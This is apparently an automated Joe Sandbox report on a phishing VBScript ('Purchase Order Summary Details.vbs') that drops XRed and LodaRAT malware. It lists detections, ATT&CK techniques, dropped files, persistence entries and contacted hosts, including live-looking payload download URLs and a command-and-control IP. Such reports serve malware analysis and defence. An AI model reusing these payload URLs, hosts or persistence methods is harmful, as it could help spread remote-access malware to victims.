                              Source: Yara matchFile source: 00000001.00000000.1765967777.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000003.1766802777.000002235F9C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000003.1764738724.000002235FCCB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000003.1765352606.000002235FEB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 7344, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: update.exe PID: 7440, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX8AC4.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\Documents\DVWHKMNFNN\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\FGNEBI[1].exe, type: DROPPED
                              Source: DELPQB.exe, 0000001D.00000002.2729907494.0000000000E0E000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
                              Source: DELPQB.exe, 0000001D.00000003.2668201777.0000000004CFF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81
                              Source: ._cache_update.exeBinary or memory string: WIN_XP
                              Source: ._cache_update.exeBinary or memory string: WIN_XPe
                              Source: ._cache_update.exe, 00000017.00000003.2270704089.000000000428E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81&
                              Source: ._cache_update.exeBinary or memory string: WIN_VISTA
                              Source: ._cache_update.exeBinary or memory string: WIN_7
                              Source: ._cache_update.exeBinary or memory string: WIN_8
                              Source: Yara matchFile source: Process Memory Space: ._cache_update.exe PID: 7720, type: MEMORYSTR

                              Remote Access Functionality

                              barindex
                              Yara detected LodaRAT
                              Source: Yara matchFile source: Process Memory Space: ._cache_update.exe PID: 7720, type: MEMORYSTR
                              Yara detected XRed
                              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                              Source: Yara matchFile source: 1.0.update.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.3.wscript.exe.2235fd7e684.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000001.00000000.1765967777.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000003.1766802777.000002235F9C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000003.1764738724.000002235FCCB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000003.1765352606.000002235FEB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 7344, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: update.exe PID: 7440, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX8AC4.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\Documents\DVWHKMNFNN\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\FGNEBI[1].exe, type: DROPPED
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F691DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,7_2_00F691DC
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F696E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,7_2_00F696E2
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DB91DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,16_2_00DB91DC
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DB96E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,16_2_00DB96E2
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F691DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,23_2_00F691DC
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F696E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,23_2_00F696E2

                              Mitre Att&ck Matrix

                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity Information631
                              Scripting                              		2
                              Valid Accounts                              		11
                              Windows Management Instrumentation                              		631
                              Scripting                              		1
                              Exploitation for Privilege Escalation                              		1
                              Disable or Modify Tools                              		21
                              Input Capture                              		2
                              System Time Discovery                              		Remote Services1
                              Archive Collected Data                              		4
                              Ingress Tool Transfer                              		Exfiltration Over Other Network Medium1
                              System Shutdown/Reboot
                              CredentialsDomains1
                              Replication Through Removable Media                              		2
                              Native API                              		1
                              DLL Side-Loading                              		1
                              DLL Side-Loading                              		1
                              Deobfuscate/Decode Files or Information                              		LSASS Memory1
                              Peripheral Device Discovery                              		Remote Desktop Protocol21
                              Input Capture                              		11
                              Encrypted Channel                              		Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts1
                              Exploitation for Client Execution                              		2
                              Valid Accounts                              		1
                              Extra Window Memory Injection                              		31
                              Obfuscated Files or Information                              		Security Account Manager1
                              Account Discovery                              		SMB/Windows Admin Shares3
                              Clipboard Data                              		3
                              Non-Application Layer Protocol                              		Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal Accounts1
                              Scheduled Task/Job                              		1
                              Scheduled Task/Job                              		2
                              Valid Accounts                              		1
                              Software Packing                              		NTDS4
                              File and Directory Discovery                              		Distributed Component Object ModelInput Capture314
                              Application Layer Protocol                              		Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchd121
                              Registry Run Keys / Startup Folder                              		21
                              Access Token Manipulation                              		1
                              DLL Side-Loading                              		LSA Secrets28
                              System Information Discovery                              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts112
                              Process Injection                              		1
                              Extra Window Memory Injection                              		Cached Domain Credentials241
                              Security Software Discovery                              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                              Scheduled Task/Job                              		12
                              Masquerading                              		DCSync121
                              Virtualization/Sandbox Evasion                              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job121
                              Registry Run Keys / Startup Folder                              		2
                              Valid Accounts                              		Proc Filesystem3
                              Process Discovery                              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt121
                              Virtualization/Sandbox Evasion                              		/etc/passwd and /etc/shadow11
                              Application Window Discovery                              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
                              Access Token Manipulation                              		Network Sniffing1
                              System Owner/User Discovery                              		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd112
                              Process Injection                              		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582353 Sample: Purchase Order Summary Deta... Startdate: 30/12/2024 Architecture: WINDOWS Score: 100 58 freedns.afraid.org 2->58 60 xred.mooo.com 2->60 62 3 other IPs or domains 2->62 78 Suricata IDS alerts for network traffic 2->78 80 Found malware configuration 2->80 82 Antivirus detection for URL or domain 2->82 86 21 other signatures 2->86 9 update.exe 1 5 2->9         started        12 wscript.exe 15 2->12         started        16 DELPQB.exe 2->16         started        18 9 other processes 2->18 signatures3 84 Uses dynamic DNS services 58->84 process4 dnsIp5 48 C:\Users\user\AppData\...\._cache_update.exe, PE32 9->48 dropped 50 C:\ProgramData\Synaptics\Synaptics.exe, PE32 9->50 dropped 52 C:\ProgramData\Synaptics\RCX8AC4.tmp, PE32 9->52 dropped 20 Synaptics.exe 116 9->20         started        25 ._cache_update.exe 2 5 9->25         started        72 raw.githubusercontent.com 185.199.108.133, 443, 49730 FASTLYUS Netherlands 12->72 54 C:\Users\user\AppData\Roaming\...\update.exe, PE32 12->54 dropped 56 C:\Users\user\AppData\Local\...\FGNEBI[1].exe, PE32 12->56 dropped 96 System process connects to network (likely due to code injection or exploit) 12->96 98 Benign windows process drops PE files 12->98 100 VBScript performs obfuscated calls to suspicious functions 12->100 106 2 other signatures 12->106 27 update.exe 12->27         started        102 Multi AV Scanner detection for dropped file 16->102 104 Machine Learning detection for dropped file 16->104 file6 signatures7 process8 dnsIp9 64 drive.usercontent.google.com 142.250.185.225, 443, 49750, 49751 GOOGLEUS United States 20->64 66 docs.google.com 142.250.185.78, 443, 49743, 49744 GOOGLEUS United States 20->66 68 freedns.afraid.org 69.42.215.252, 49747, 80 AWKNET-LLCUS United States 20->68 42 C:\Users\user\Documents\DVWHKMNFNN\~$cache1, PE32 20->42 dropped 88 Antivirus detection for dropped file 20->88 90 Multi AV Scanner detection for dropped file 20->90 92 Drops PE files to the document folder of the user 20->92 94 Machine Learning detection for dropped file 20->94 29 WerFault.exe 20->29         started        31 WerFault.exe 20->31         started        70 172.111.138.100, 49754, 49800, 49848 VOXILITYGB United States 25->70 44 C:\Users\user\AppData\Roaming\...\DELPQB.exe, PE32 25->44 dropped 46 C:\Users\user\AppData\Local\Temp\WLJOQW.vbs, ASCII 25->46 dropped 33 cmd.exe 25->33         started        36 wscript.exe 25->36         started        file10 signatures11 process12 signatures13 74 Uses schtasks.exe or at.exe to add and modify task schedules 33->74 38 conhost.exe 33->38         started        40 schtasks.exe 33->40         started        76 Windows Scripting host queries suspicious COM object (likely to drop second stage) 36->76 process14

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand

                              Antivirus, Machine Learning and Genetic Malware Detection

                              Initial Sample

                              SourceDetectionScannerLabelLink
                              Purchase Order Summary Details.vbs43%VirustotalBrowse
                              Purchase Order Summary Details.vbs26%ReversingLabsWin32.Trojan.Valyria

                              Dropped Files

                              SourceDetectionScannerLabelLink
                              C:\Users\user\Documents\DVWHKMNFNN\~$cache1100%AviraTR/Dldr.Agent.SH
                              C:\Users\user\Documents\DVWHKMNFNN\~$cache1100%AviraW2000M/Dldr.Agent.17651006
                              C:\ProgramData\Synaptics\RCX8AC4.tmp100%AviraTR/Dldr.Agent.SH
                              C:\ProgramData\Synaptics\RCX8AC4.tmp100%AviraW2000M/Dldr.Agent.17651006
                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe100%AviraTR/Dldr.Agent.SH
                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe100%AviraW2000M/Dldr.Agent.17651006
                              C:\ProgramData\Synaptics\Synaptics.exe100%AviraTR/Dldr.Agent.SH
                              C:\ProgramData\Synaptics\Synaptics.exe100%AviraW2000M/Dldr.Agent.17651006
                              C:\Users\user\AppData\Local\Temp\WLJOQW.vbs100%AviraVBS/Runner.VPJI
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\FGNEBI[1].exe100%AviraTR/Dldr.Agent.SH
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\FGNEBI[1].exe100%AviraW2000M/Dldr.Agent.17651006
                              C:\Users\user\Documents\DVWHKMNFNN\~$cache1100%Joe Sandbox ML
                              C:\ProgramData\Synaptics\RCX8AC4.tmp100%Joe Sandbox ML
                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe100%Joe Sandbox ML
                              C:\ProgramData\Synaptics\Synaptics.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\FGNEBI[1].exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Roaming\Windata\DELPQB.exe100%Joe Sandbox ML
                              C:\ProgramData\Synaptics\RCX8AC4.tmp100%ReversingLabsWin32.Worm.Zorex
                              C:\ProgramData\Synaptics\Synaptics.exe92%ReversingLabsWin32.Trojan.Synaptics
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\FGNEBI[1].exe92%ReversingLabsWin32.Trojan.Synaptics
                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe47%ReversingLabsWin32.Trojan.Lisk
                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe92%ReversingLabsWin32.Trojan.Synaptics
                              C:\Users\user\AppData\Roaming\Windata\DELPQB.exe47%ReversingLabsWin32.Trojan.Lisk
                              C:\Users\user\Documents\DVWHKMNFNN\~$cache1100%ReversingLabsWin32.Worm.Zorex

                              Unpacked PE Files

                              No Antivirus matches

                              Domains

                              No Antivirus matches

                              URLs

                              SourceDetectionScannerLabelLink
                              http://xred.site50.net/syn/SSLLibrary.dl100%Avira URL Cloudmalware
                              https://drive.usercontent.goog=:0%Avira URL Cloudsafe

                              Domains and IPs

                              Contacted Domains

                              NameIPActiveMaliciousAntivirus DetectionReputation
                              freedns.afraid.org
                              		69.42.215.252
                              		truefalse
                                		high
                                docs.google.com
                                		142.250.185.78
                                		truefalse
                                  		high
                                  raw.githubusercontent.com
                                  		185.199.108.133
                                  		truefalse
                                    		high
                                    drive.usercontent.google.com
                                    		142.250.185.225
                                    		truefalse
                                      		high
                                      xred.mooo.com
                                      		unknown
                                      		unknownfalse
                                        		high

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        xred.mooo.comfalse
                                          		high
                                          http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978false
                                            		high
                                            https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/FGNEBI.exefalse
                                              		high

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1update.exe, 00000001.00000000.1765967777.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Synaptics.exe, 0000000A.00000002.2806590322.00000000022C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                		high
                                                https://drive.usercontent.goog=:Synaptics.exe, 0000000A.00000002.2820637181.0000000007203000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=Tupdate.exe, 00000006.00000003.1904510384.00000000022F0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/FGNEBI.exeyVwscript.exe, 00000000.00000002.1768192075.000002235F8C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://docs.google.com/4Synaptics.exe, 0000000A.00000003.2047511429.0000000005726000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://raw.githubusercontent.com/7wscript.exe, 00000000.00000003.1767332969.000002235F928000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1768209242.000002235F928000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1767157683.000002235F928000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://xred.site50.net/syn/Synaptics.rarupdate.exe, 00000006.00000003.1904510384.00000000022F0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2806590322.00000000022C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/mainwscript.exe, wscript.exe, 00000000.00000002.1767855881.000002235D1C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1768173993.000002235F7C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1765415076.000002235F95C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://docs.google.com/dSynaptics.exe, 0000000A.00000003.2047511429.0000000005726000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://docs.google.com/Synaptics.exe, 0000000A.00000003.2047511429.0000000005726000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000003.2047511429.00000000056FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://raw.githubusercontent.com/wscript.exe, 00000000.00000003.1765701349.000002235D2B4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1768209242.000002235F928000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1767157683.000002235F928000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://docs.google.com/8zMZSynaptics.exe, 0000000A.00000003.2047511429.0000000005726000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/FGNEBI.exe(qQwscript.exe, 00000000.00000003.1766882659.000002235F095000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://xred.site50.net/syn/SSLLibrary.dlupdate.exe, 00000006.00000003.1904510384.00000000022F0000.00000004.00001000.00020000.00000000.sdmptrue
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/FGNEBI.exeQwscript.exe, 00000000.00000003.1766540668.000002235D233000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1768024025.000002235D235000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1update.exe, 00000001.00000000.1765967777.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Synaptics.exe, 0000000A.00000002.2806590322.00000000022C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1update.exe, 00000006.00000003.1904510384.00000000022F0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2806590322.00000000022C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/FGNEBI.exeVwscript.exe, 00000000.00000002.1768192075.000002235F8C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/FGNEBI.exe32wscript.exe, 00000000.00000002.1768192075.000002235F8C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://xred.site50.net/syn/SUpdate.iniupdate.exe, 00000006.00000003.1904510384.00000000022F0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2806590322.00000000022C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://drive.usercontent.google.com/download?Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://docs.google.com/uc?id=0;Synaptics.exe, 0000000A.00000002.2863779915.00000000157FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2869325924.0000000017FFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2858499668.0000000012EBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2853272324.000000001023E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2930202179.000000002B0BE000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://raw.githubusercontent.com/.com1wscript.exe, 00000000.00000003.1767332969.000002235F928000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1768209242.000002235F928000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1767157683.000002235F928000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://ip-score.com/checkip/16._cache_update.exe, 00000007.00000002.3025189873.00000000048F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://docs.google.com/4XzmZSynaptics.exe, 0000000A.00000003.2047511429.0000000005726000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://xred.site50.net/syn/SSLLibrary.dllupdate.exe, 00000006.00000003.1903419089.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2806590322.00000000022C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlupdate.exe, 00000006.00000003.1904510384.00000000022F0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                		high

                                                                                                World Map of Contacted IPs

                                                                                                • No. of IPs < 25%
                                                                                                • 25% < No. of IPs < 50%
                                                                                                • 50% < No. of IPs < 75%
                                                                                                • 75% < No. of IPs

                                                                                                Public IPs

                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                142.250.185.78
                                                                                                		docs.google.comUnited States
                                                                                                		15169GOOGLEUSfalse
                                                                                                185.199.108.133
                                                                                                		raw.githubusercontent.comNetherlands
                                                                                                		54113FASTLYUSfalse
                                                                                                172.111.138.100
                                                                                                		unknownUnited States
                                                                                                		3223VOXILITYGBtrue
                                                                                                69.42.215.252
                                                                                                		freedns.afraid.orgUnited States
                                                                                                		17048AWKNET-LLCUSfalse
                                                                                                142.250.185.225
                                                                                                		drive.usercontent.google.comUnited States
                                                                                                		15169GOOGLEUSfalse

                                                                                                General Information

                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                Analysis ID:1582353
                                                                                                Start date and time:2024-12-30 11:46:36 +01:00
                                                                                                Joe Sandbox product:CloudBasic
                                                                                                Overall analysis duration:0h 11m 30s
                                                                                                Hypervisor based Inspection enabled:false
                                                                                                Report type:full
                                                                                                Cookbook file name:default.jbs
                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                Number of analysed new started processes analysed:31
                                                                                                Number of new started drivers analysed:0
                                                                                                Number of existing processes analysed:0
                                                                                                Number of existing drivers analysed:0
                                                                                                Number of injected processes analysed:1
                                                                                                Technologies:
                                                                                                • HCA enabled
                                                                                                • EGA enabled
                                                                                                • AMSI enabled
                                                                                                Analysis Mode:default
                                                                                                Analysis stop reason:Timeout
                                                                                                Sample name:Purchase Order Summary Details.vbs
                                                                                                Detection:MAL
                                                                                                Classification:mal100.troj.adwa.expl.evad.winVBS@27/89@14/5
                                                                                                EGA Information:
                                                                                                • Successful, ratio: 75%
                                                                                                HCA Information:
                                                                                                • Successful, ratio: 100%
                                                                                                • Number of executed functions: 89
                                                                                                • Number of non-executed functions: 272
                                                                                                Cookbook Comments:
                                                                                                • Found application associated with file extension: .vbs

                                                                                                Warnings

                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, consent.exe, sppsvc.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                • Excluded IPs from analysis (whitelisted): 52.109.89.18, 184.28.90.27, 52.113.194.132, 51.132.193.104, 20.42.65.92, 4.175.87.197, 40.126.31.69, 173.222.162.32, 13.107.246.45
                                                                                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, onedscolprduks02.uksouth.cloudapp.azure.com, weu-azsc-config.officeapps.live.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, www.bing.com, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                                                                                                • Execution Graph export aborted for target Synaptics.exe, PID 7792 because there are no executed function
                                                                                                • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                Simulations

                                                                                                Behavior and APIs

                                                                                                TimeTypeDescription
                                                                                                05:47:58API Interceptor559x Sleep call for process: Synaptics.exe modified
                                                                                                05:49:19API Interceptor2x Sleep call for process: WerFault.exe modified
                                                                                                10:47:39AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
                                                                                                10:47:52AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WLJOQW "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
                                                                                                10:47:54Task SchedulerRun new task: WLJOQW.exe path: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                                                                                10:48:01AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                10:48:09AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WLJOQW "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
                                                                                                10:48:17AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe
                                                                                                10:48:25AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WLJOQW.lnk

                                                                                                Joe Sandbox View / Context

                                                                                                IPs

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                185.199.108.133cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
